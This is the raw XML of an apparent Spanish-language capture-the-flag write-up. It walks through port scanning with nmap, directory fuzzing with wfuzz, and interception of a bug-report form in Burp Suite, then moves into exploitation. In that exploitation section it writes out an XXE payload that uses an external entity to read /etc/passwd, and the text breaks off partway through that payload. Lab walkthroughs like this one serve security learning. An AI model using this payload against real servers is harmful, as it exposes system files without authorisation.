                                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                                  <wp:docPr id="1749275129" name="Imagen 1749275129" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza medi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83210" cy="195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lawik Semibold" w:hAnsi="Selawik Semibold"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t xml:space="preserve">  </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00A56118">
                              <w:rPr>
                                <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>Para más contenido visita mi canal de YouTube: Hacke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D22A5" id="_x0000_s1042" style="position:absolute;margin-left:542.8pt;margin-top:714.5pt;width:594pt;height:55.5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" fillcolor="black [3213]" strokecolor="#09101d [484]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6B0FB606" w14:textId="586BD937" w:rsidR="0051639D" w:rsidRPr="00A56118" w:rsidRDefault="007A24E7" w:rsidP="007A24E7">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold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Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                          <w:lang w:val="es-ES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C76FF6" wp14:editId="501F361D">
                            <wp:extent cx="270934" cy="187375"/>
                            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                            <wp:docPr id="1749275129" name="Imagen 1749275129" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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83210" cy="195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lawik Semibold" w:hAnsi="Selawik Semibold"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t xml:space="preserve">  </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00A56118">
                        <w:rPr>
                          <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>Para más contenido visita mi canal de YouTube: HackeMat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59A2A35" w14:textId="1CD5E41A" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46521DF4" w14:textId="1A7BA7A0" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5753E64B" w14:textId="2BFE88FD" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B69E1E" w14:textId="36AA89C5" w:rsidR="0051639D" w:rsidRDefault="0051639D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B76243" w14:textId="7F30A80D" w:rsidR="00FA6809" w:rsidRPr="00206A93" w:rsidRDefault="00FA6809" w:rsidP="00FA6809">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc138803585"/>
      <w:r w:rsidRPr="00206A93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Análisis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1959B6A4" w14:textId="44BD49A7" w:rsidR="00FA6809" w:rsidRDefault="00F5411F" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Utilizamos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para analizar los puertos abiertos con el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48521F1E" w14:textId="59FC888A" w:rsidR="00F5411F" w:rsidRDefault="00F5411F" w:rsidP="00FA6809">
      <w:r w:rsidRPr="00F5411F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="480EFBE3" wp14:editId="467C65E7">
            <wp:extent cx="5496560" cy="1172845"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1745790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90558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9894" b="89753" l="6407" r="94150">
                                  <a14:foregroundMark x1="6407" y1="24382" x2="9749" y2="53357"/>
                                  <a14:foregroundMark x1="93872" y1="28622" x2="94150" y2="3922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892" t="11335" r="2224" b="11630"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5503379" cy="117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427C4" w14:textId="77777777" w:rsidR="00F71477" w:rsidRPr="00F71477" w:rsidRDefault="00F71477" w:rsidP="00F7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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PORT   STATE SERVICE REASON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7296658A" w14:textId="77777777" w:rsidR="00F71477" w:rsidRPr="00F71477" w:rsidRDefault="00F71477" w:rsidP="00F7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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     syn-ack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087ECBA1" w14:textId="0EC24916" w:rsidR="00F5411F" w:rsidRDefault="00F71477" w:rsidP="00F7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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open  http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    syn-ack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F29209" w14:textId="77777777" w:rsidR="00A24C53" w:rsidRPr="00795925" w:rsidRDefault="00A24C53" w:rsidP="00F71477">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BA25880" w14:textId="098BB28A" w:rsidR="00F71477" w:rsidRDefault="00F71477" w:rsidP="00F71477">
      <w:r w:rsidRPr="00F71477">
        <w:t>Si entramos al Puerto 80 v</w:t>
      </w:r>
      <w:r>
        <w:t>eremos lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50464C66" w14:textId="15E37EFF" w:rsidR="00F71477" w:rsidRDefault="00A24C53" w:rsidP="00A24C53">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C53">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="538BC4CB" wp14:editId="20FEF5DC">
            <wp:extent cx="5400040" cy="3445510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="53413120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31204" name="Imagen 1" descr="Interfaz de usuario gráfica, Sitio web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92A5" w14:textId="77777777" w:rsidR="00A24C53" w:rsidRPr="00F71477" w:rsidRDefault="00A24C53" w:rsidP="00A24C53"/>
    <w:p w14:paraId="13987C60" w14:textId="1A8A941A" w:rsidR="00F71477" w:rsidRDefault="0087161E" w:rsidP="00F71477">
      <w:r>
        <w:t xml:space="preserve">Ahora, lo que podemos hacer es intentar averiguar si existen rutas/vías potenciales para encontrar algún directorio activo. Para ello, utilizaremos la herramienta de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA586B6" w14:textId="32E2A6A1" w:rsidR="0087161E" w:rsidRDefault="007313E7" w:rsidP="00F71477">
      <w:r w:rsidRPr="007313E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C1F385E" wp14:editId="3D727F0F">
            <wp:extent cx="5476240" cy="644264"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="155857697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76978" name="Imagen 1" descr="Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente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9508" b="89508" l="5453" r="95933">
                                  <a14:foregroundMark x1="5453" y1="26557" x2="9519" y2="54098"/>
                                  <a14:foregroundMark x1="95933" y1="50820" x2="95933" y2="5082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788" t="10675" r="2258" b="9258"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5495546" cy="64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E54A1" w14:textId="7EE4234B" w:rsidR="00611C6B" w:rsidRDefault="00611C6B" w:rsidP="00F71477">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Y el resultado es el siguiente:”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666E351" w14:textId="75191188" w:rsidR="00611C6B" w:rsidRDefault="00611C6B" w:rsidP="00F71477">
      <w:r w:rsidRPr="00611C6B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DC2956D" wp14:editId="16D0AF0B">
            <wp:extent cx="5400040" cy="1494155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1031057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571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E96F" w14:textId="77777777" w:rsidR="00611C6B" w:rsidRDefault="00611C6B" w:rsidP="00F71477"/>
    <w:p w14:paraId="1FEA895A" w14:textId="436C546C" w:rsidR="00611C6B" w:rsidRDefault="00611C6B" w:rsidP="00F71477">
      <w:r>
        <w:t>Al tener una respuesta 301 podemos intentar averiguar qué es lo que devuelve al ingresar</w:t>
      </w:r>
      <w:r w:rsidR="004D731F">
        <w:t>lo manualmente desde el navegador:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573543E8" w14:textId="7E9D1BEA" w:rsidR="004D731F" w:rsidRDefault="004D731F" w:rsidP="004D731F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004D731F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C44D019" wp14:editId="49B69E57">
            <wp:extent cx="4254500" cy="3942080"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="581453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53918" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="6927"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4254719" cy="394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0CF3" w14:textId="77777777" w:rsidR="004D731F" w:rsidRDefault="004D731F" w:rsidP="004D731F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF47994" w14:textId="63111401" w:rsidR="007313E7" w:rsidRDefault="004D731F" w:rsidP="00F71477">
      <w:r>
        <w:t>Ahora</w:t>
      </w:r>
      <w:r w:rsidR="00274609">
        <w:t>, visualizaremos el contenido del fichero README.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31895C0F" w14:textId="003250E6" w:rsidR="00274609" w:rsidRDefault="00274609" w:rsidP="00274609">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00274609">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="255648F8" wp14:editId="78297DBD">
            <wp:extent cx="5400040" cy="1318895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="819641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415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BFE1" w14:textId="77777777" w:rsidR="00274609" w:rsidRDefault="00274609" w:rsidP="00274609">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629B452C" w14:textId="633FE328" w:rsidR="00274609" w:rsidRDefault="00EF35DB" w:rsidP="00274609">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Visualizamos que el desarrollador ha tenido 4 tareas por hacer, pero solo ha cumplido 2</w:t>
      </w:r>
      <w:r w:rsidR="00EC0C62">
        <w:t>, es decir, l</w:t>
      </w:r>
      <w:r>
        <w:t>a primera y tercera le faltó culminar. Entonces ingresaremos al portal para analizar lo que está pasando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC80FB" w14:textId="0CCDF997" w:rsidR="00EF35DB" w:rsidRDefault="006E2B5B" w:rsidP="00274609">
      <w:r w:rsidRPr="006E2B5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54ECC330" wp14:editId="6840E3D5">
            <wp:extent cx="5400040" cy="640715"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="801218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187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34E2" w14:textId="186552D9" w:rsidR="006E2B5B" w:rsidRDefault="006E2B5B" w:rsidP="00274609">
      <w:r w:rsidRPr="006E2B5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02280143" wp14:editId="44081E1F">
            <wp:extent cx="5400040" cy="1389380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="191671031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10314" name="Imagen 1" descr="Captura de pantalla de un celular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242B" w14:textId="77777777" w:rsidR="006E2B5B" w:rsidRDefault="006E2B5B" w:rsidP="00274609"/>
    <w:p w14:paraId="095DB507" w14:textId="36B16DD1" w:rsidR="004D731F" w:rsidRDefault="00FB6137" w:rsidP="00F71477">
      <w:r>
        <w:t>Ahora, si testeamos los inputs de la plataforma vemos que se está guardando e imprimiendo los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49655020" w14:textId="1F5BDAA1" w:rsidR="00FB6137" w:rsidRDefault="00B27B15" w:rsidP="00F71477">
      <w:r w:rsidRPr="00B27B15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21DF0C8F" wp14:editId="2C7896D3">
            <wp:extent cx="5400040" cy="2653030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2129649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493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5AF5" w14:textId="77777777" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477"/>
    <w:p w14:paraId="0914CAB0" w14:textId="31358E45" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477">
      <w:r>
        <w:t xml:space="preserve">Ahora, veremos qué datos está tramitando mientras se pulsa el botón de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B27B15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Para ello, utilizaremos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C9A204" w14:textId="79B92895" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477">
      <w:r w:rsidRPr="00B27B15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F56C939" wp14:editId="7458E453">
            <wp:extent cx="4875908" cy="3233213"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5715"/>
            <wp:docPr id="171660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03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6024" cy="323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9F0E" w14:textId="77777777" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477"/>
    <w:p w14:paraId="5ECF7049" w14:textId="40BE7731" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477">
      <w:r>
        <w:t xml:space="preserve">Daremos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> derecho y mandaremos al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para ver la respuesta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A368323" w14:textId="1215BEB3" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477">
      <w:r w:rsidRPr="00B27B15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6741914C" wp14:editId="51B9F0E1">
            <wp:extent cx="5400040" cy="3445510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1318952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5282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96BF" w14:textId="77777777" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477"/>
    <w:p w14:paraId="481DFCAA" w14:textId="0301CA6A" w:rsidR="00A6207F" w:rsidRDefault="00A6207F" w:rsidP="00F71477">
      <w:r>
        <w:t xml:space="preserve">Identificamos que el valor de la data está en base64, por lo que si lo desciframos con </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6207F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>base64 -d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el resultado es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450F1D9" w14:textId="119005FB" w:rsidR="00A6207F" w:rsidRDefault="00A6207F" w:rsidP="00F71477">
      <w:r w:rsidRPr="00A6207F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D421811" wp14:editId="5C0BDBAF">
            <wp:extent cx="5622601" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="180014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430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4962" cy="6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B4EB" w14:textId="0B9A46B2" w:rsidR="00FA6809" w:rsidRPr="00206A93" w:rsidRDefault="00FA6809" w:rsidP="00FA6809">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc138803586"/>
      <w:r w:rsidRPr="00206A93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explotación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="771BEBA2" w14:textId="065C5E4B" w:rsidR="000C007C" w:rsidRDefault="000C007C" w:rsidP="00FA6809">
      <w:r w:rsidRPr="000C007C">
        <w:t>En esta etapa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, utilizaremos un XXE desde la página oficial de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidRPr="00FA4315">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/xxe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEDEF3A" w14:textId="77777777" w:rsidR="006F6DC0" w:rsidRDefault="006F6DC0" w:rsidP="00FA6809"/>
    <w:p w14:paraId="6B15C7A6" w14:textId="1077B06D" w:rsidR="000C007C" w:rsidRDefault="006F6DC0" w:rsidP="00FA6809">
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB81279" wp14:editId="7ADA242E">
            <wp:extent cx="5595098" cy="3114675"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="113825671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56713" name="Imagen 1" descr="Diagram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9594" cy="311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F09E" w14:textId="77777777" w:rsidR="006F6DC0" w:rsidRDefault="006F6DC0" w:rsidP="00FA6809"/>
    <w:p w14:paraId="56FE088E" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml  version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9B0839" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58976E56" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4470CE35" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;title&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A38F7C" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
